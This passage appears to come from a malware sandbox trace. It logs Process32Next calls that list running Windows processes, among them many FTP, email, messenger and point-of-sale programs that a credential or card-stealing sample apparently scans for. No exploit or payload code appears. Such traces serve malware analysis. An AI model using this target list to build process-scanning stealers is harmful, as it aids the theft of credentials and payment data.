th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0158.015] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0158.017] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0158.018] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.021] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.022] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0158.024] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.025] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.101] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.102] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.104] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.105] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.107] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.109] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0158.110] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0158.112] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0158.114] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0158.115] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.117] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0158.118] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0158.120] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0158.122] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0158.123] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0158.125] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0158.126] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.128] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0158.130] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0158.132] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0158.133] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0158.159] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.161] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0158.163] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0158.165] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0158.168] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0158.170] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0158.172] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0158.173] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0158.175] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0158.176] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0158.178] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0158.180] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0158.182] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0158.183] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0158.185] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0158.186] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0158.188] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0158.189] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0158.191] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0158.193] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0158.198] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0158.199] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0158.201] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0158.203] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0158.205] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0158.207] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0158.209] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0158.211] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0158.214] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0158.216] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0158.218] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0158.220] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0158.222] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0158.224] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0158.226] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0158.228] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0158.230] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0158.232] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0158.239] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0158.242] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0158.245] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0158.248] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0158.251] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0158.254] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0158.257] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0158.260] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0158.262] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0158.267] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0158.270] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0158.273] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0158.278] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0158.281] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0158.284] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0158.286] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0158.289] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0158.292] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, 